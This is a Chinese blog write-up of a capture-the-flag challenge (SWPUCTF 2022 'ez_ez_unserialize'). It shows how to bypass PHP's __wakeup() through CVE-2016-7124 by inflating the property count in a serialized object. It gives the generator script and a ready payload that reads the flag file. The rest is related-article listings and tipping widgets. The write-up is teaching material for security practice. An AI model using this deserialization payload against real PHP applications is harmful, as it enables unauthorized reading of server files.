NSS [SWPUCTF 2022 新生赛]ez_ez_unserialize

最新推荐文章于 2024-06-12 21:22:26 发布
最新推荐文章于 2024-06-12 21:22:26 发布
阅读量467 收藏 3
点赞数 8
分类专栏: CTF-web(零散wp合集) 文章标签: 网络安全 web安全 CTF NSS PHP 反序列化 SWPUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jayjay___/article/details/136852697
版权

NSS [SWPUCTF 2022 新生赛]ez_ez_unserialize

开题,直接给了题目源码。

image-20231009004021264

简单看了一下,题目告诉我们flag在哪,而且类中有高亮文件方法。怎么拿flag已经很明显了。关键点在于__weakup()魔术方法固定死了我们高亮的文件。所以这题只需要绕过__weakup()

PHP版本是5.5.38

image-20231009004340213

我们可以使用使对象的属性数量不一致凡凡来绕过

CVE-2016-7124

版本:PHP5 < 5.6.25、PHP7 < 7.0.10

版本满足,我们来编写EXP:

<?php
class X{
    public $x ;
    function __construct($x)
    {
        $this->x = $x;
    }
    function __wakeup()
    {
        if($this->x !== __FILE__){
            $this->x = __FILE__;
        }
    }
    function __destruct()
    {
        highlight_file($this->x);
        //flag is in fllllllag.php
    }
}
echo serialize(new X("fllllllag.php"));

生成的
O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}
修改为
O:1:"X":2:{s:1:"x";s:13:"fllllllag.php";}

payload:

?x=O:1:"X":2:{s:1:"x";s:13:"fllllllag.php";}

image-20231009010704475

Jay 17
关注
  • 8
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[SWPUCTF 2022 新生] 刷题记录
rev1ve的博客
08-12 744
SWPUCTF 2022 新生 若调用类中的静态方法,则需要传递一个数组作为第一个参数。数组的第一个元素是类名,第二个元素是要调用的静态方法名。F12,web开发者都被办了,尝试查看源代码,得到。跟第二关相比变成了强等于,直接数组绕过。打开题目,发现加到19就会变成-20。很明显是使用sql注入中的万能密码。一看就是base64加密,直接解码。打开题目,第一关提示在http头。分析一下,提示POST传参,出现。分析一下,进行反序列化时,会让。然后执行函数,且参数值为。绕过后,得到第三关源代码。
SWPUCTF 2022 新生-WEB部分wp
m0_74606212的博客
09-24 544
SWPUCTF 2022 新生-WEB部分wp
[SWPUCTF 2022 新生]ez_1zpop
qing_chuan_的博客
08-04 251
可以利用这个,将a的值提前写好为system,title为ls cat flag啥的。梳理下来,就是construct->to_string->destruct。在it类中触发__wake up,会返回到一个没有用的类里,要绕过一下。$b就会被赋值为system,内容为ls。最终playload。
SWPUCTF 2022新生 web部分wp
weixin_44770698的博客
01-16 3713
SWPUCTF 2022新生
WebSWPUCTF 2022 新生 个人复现
uuzeray的博客
11-28 652
挑了部分题,太简单的就没选进来(但选进来≠有难度)
NSSCTF中的[SWPUCTF 2022 新生]ez_ez_unserialize、baby_file、Middle magic、numgame、where_am_i、easy_upload
2401_82388450的博客
06-06 916
1.绕过wakeup函数可以将序列化的中的成员数大于实际成员数2.了解了json_decode函数函数只能匹配一行的数据,因此我们只需先传入换行符,那么后面的传入便不再被匹配4.php弱比较时,面对纯字符与0的比较时,会返回true5.了解了call_user_func()函数,知道了::双冒号运算符。
NSSCTF刷题笔记web10——[SWPUCTF 2021 新生]ez_unserialize
qq_45692883的博客
01-18 491
进行代码审计,也是非常非常的简单,只需要构造一个序列化后的字符串,然后替换其中的数据即可。复制上面类的php代码,替换其中的用户名以及密码进行序列化,执行即可得到payload。源代码提示了这一串数据,是robots.txt的格式。上来问我题目在哪,一般都是直接先看源代码。直接访问robots.txt。
NSSCTF-[SWPUCTF 2022]-web
J1ng_Hong的博客
11-14 585
ls发现根目录下有一个flag文件,然后用cat把他读取出来就行了。然后就得到了flag。
NSS [UUCTF 2022 新生]ez_unser
Jay17的博客
07-04 734
NSS [UUCTF 2022 新生]ez_unser
NSS.rar_nss 内核_哈希表
09-19
封装了Linux内核开发中的一些重要数据结构,包括队列、哈希表等,以及一些网络函数和多线程互斥机制
Nss.rar_get rsakey card_nss_ssl
09-14
netscape ssl库wince版本
NSS.zip_NSS模型_finallyqk3_nss利率_nss模型程序_利率期限结构
09-21
NSS模型程序,利率期限结构动态预测 非线性最小二乘法
NNS.rar_NSS.rar_nss
09-21
NSS genuin for windows
NSS_PPT_CHAP07_V1.5.ppt
04-13
NSS_PPT_CHAP07_V1.5
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8288
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全】【深度学习】【入侵检测】SDN模拟网络入侵攻击并检测,实时检测,深度学习【二】
q742971636的博客
06-12 393
以通过 Alt+F2 然后输入 xterm 尝试打开xterm。这之后就可以用Ctrl+Alt+T打开新终端了。在之前的代码中,已经捕获到攻击流量并打印。
2024中国网络安全产品用户调查报告(发布版)
2301_76786857的博客
06-12 697
本报告正是安在新媒体发起,基于“诸子云社群,以“取之于民,用之于民"的方式,反馈“甲方"眼中的中国网络安全市场情况,为网络安全行业提供来自网络安全企业用户视角的参考。自2020年始,人类进入了21世纪的第二个十年,全球进入了百年未有之大变局,新十年的开始即被新冠疫情逆转了全球化发展的历程,而至2022年3月俄乌战争又突然爆发,紧接着2023年7月“巴以冲突"皱起,世界快速进入动荡中,不确定性激增,网络对抗愈演愈烈,导致中国网络安全市场和环境受到重大影响。
车载网络安全指南 概述(一)
最新发布
qq_42357877的博客
06-12 249
汽车电子系统网络安全指南给出汽车电子系统网络安全活动框架,以及在此框架下的汽车电子系统网络安全活动、组织管理和支持保障等方面的建议。汽车电子系统网络安全指南适用于指导整车厂、零部件供应商、软件供应商、芯片供应商以及各种服务提供商等汽车电子供应链上各组织机构开展网络安全活动,指导相关人员在从事汽车电子系统的设计开发、生产、运行和服务等过程中满足基本的网络安全需求。
SPI_NSS_PULSE_DISABLE
05-12
SPI_NSS_PULSE_DISABLE是STM32系列芯片上SPI外设的一个功能,用于控制片选信号的输出方式。当该功能开启时,片选信号不会产生脉冲,而是直接保持低电平或高电平。这种方式可以提高SPI通讯的稳定性和可靠性,特别是在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Jay 17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值